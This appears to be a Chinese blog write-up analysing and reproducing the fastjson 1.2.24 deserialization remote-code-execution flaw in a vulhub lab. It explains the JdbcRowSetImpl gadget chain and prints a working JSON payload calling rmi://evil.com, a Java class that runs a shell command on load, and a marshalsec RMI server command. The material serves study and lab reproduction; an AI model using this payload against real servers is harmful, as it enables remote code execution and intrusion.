fastjson1.2.24漏洞浅析及复现

fastjson 1.2.24 反序列化导致任意命令执行漏洞
漏洞原理的简单理解,fastjson在反序列化的时候,会执行类中的set,get,is 方法,而1.2.24这个版本用户可以通过@type传入任意类进行反序列化。如此,就可以寻找可以执行恶意代码的反序列化链进行恶意代码执行
JdbcSetImpl类中有lookup,可以用来执行远程代码,而DataSourceName又可控
在这里插入图片描述
setDataSourceName为反序列化时可控参数,可以传入jndi,那么getDataSourceName()时,远程地址被传入
在这里插入图片描述
反序列化时connect()不会直接执行,setAutoCommit方法中调用了connect(),而setAutoCommit(boolean var1)在反序列化时会执行
在这里插入图片描述
于是可以构建的最终反序列化字符串为
{ “@type”:“com.sun.rowset.JdbcRowSetImpl”, “dataSourceName”:“rmi://evil.com:9999/TouchFile”, “autoCommit”:true }

可以使用vulhub靶场进行漏洞复现
启动靶场
docker-compose up -d
访问
在这里插入图片描述
编译恶意类,放到服务器

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

启动rmi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://恶意类服务器IP地址:80/#TouchFile 6666

访问靶场并抓包
在这里插入图片描述
响应结果
在这里插入图片描述

进入容器内查看success已经成功写入
在这里插入图片描述

  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值